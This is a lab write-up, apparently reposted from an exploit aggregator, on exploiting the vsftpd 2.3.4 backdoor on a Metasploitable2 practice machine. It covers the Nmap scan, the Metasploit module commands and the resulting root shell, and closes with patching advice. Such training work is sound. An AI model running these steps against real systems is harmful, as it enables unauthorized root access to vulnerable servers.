## https://sploitus.com/exploit?id=4D01A3A1-75C7-5730-8C5D-B2EC1F56532F
# Exploiting-FTP-Service-Port-21-on-Metasploitable2
1. Objective
The purpose of this lab is to demonstrate the process of identifying a service vulnerability and exploiting a known backdoor in the vsftpd 2.3.4 service to gain unauthorized root access to a target machine.
2. Lab EnvironmentAttacker Machine:
Kali Linux (IP: 192.168.226.129).Target Machine: Metasploitable2 (IP: 192.168.226.130).Software Used: Zenmap/Nmap, Metasploit Framework (MSF).
3. Phase 1: Information Gathering & Scanning:
I started by scanning the target machine to identify open ports and service versions.
Tool: Zenmap (Intense Scan).
Action: Running nmap -T4 -A -v 192.168.226.130.
Findings: The scan revealed that Port 21 (TCP) is open and running vsftpd 2.3.4
4. Phase 2: Vulnerability Analysis:
Researching the identified version (vsftpd 2.3.4) revealed it is notoriously vulnerable to a "Backdoor Command Execution" flaw (CVE-2011-2523).
Exploit Discovery: I searched for a compatible module within the Metasploit Framework.
msf > search vsftpd 2.3.4.
Result: exploit/unix/ftp/vsftpd_234_backdoor
5. Phase 3: Exploitation:
I configured the exploit module to target the machine's IP address.
Selection: use exploit/unix/ftp/vsftpd_234_backdoor.
Configuration: Set the target IP.
set RHOSTS 192.168.226.130.
Execution: Ran the exploit command
Success Evidence:
The exploit successfully triggered the backdoor service. A command shell was spawned immediately.
192.168.226.130:21 - Backdoor service has been spawned, handling....
Command shell session 1 opened.
6. Phase 4: Post-Exploitation:
After gaining access, I verified the level of control over the target.
Command: pwd and id.
Observation: The shell returned uid=0(root), confirming full administrative access to the system.
7. Conclusion & Mitigation:
The exploit was successful due to the use of an outdated and compromised service version.
Mitigation: The service should be updated to a secure, patched version of vsftpd or replaced with a more secure FTP alternative.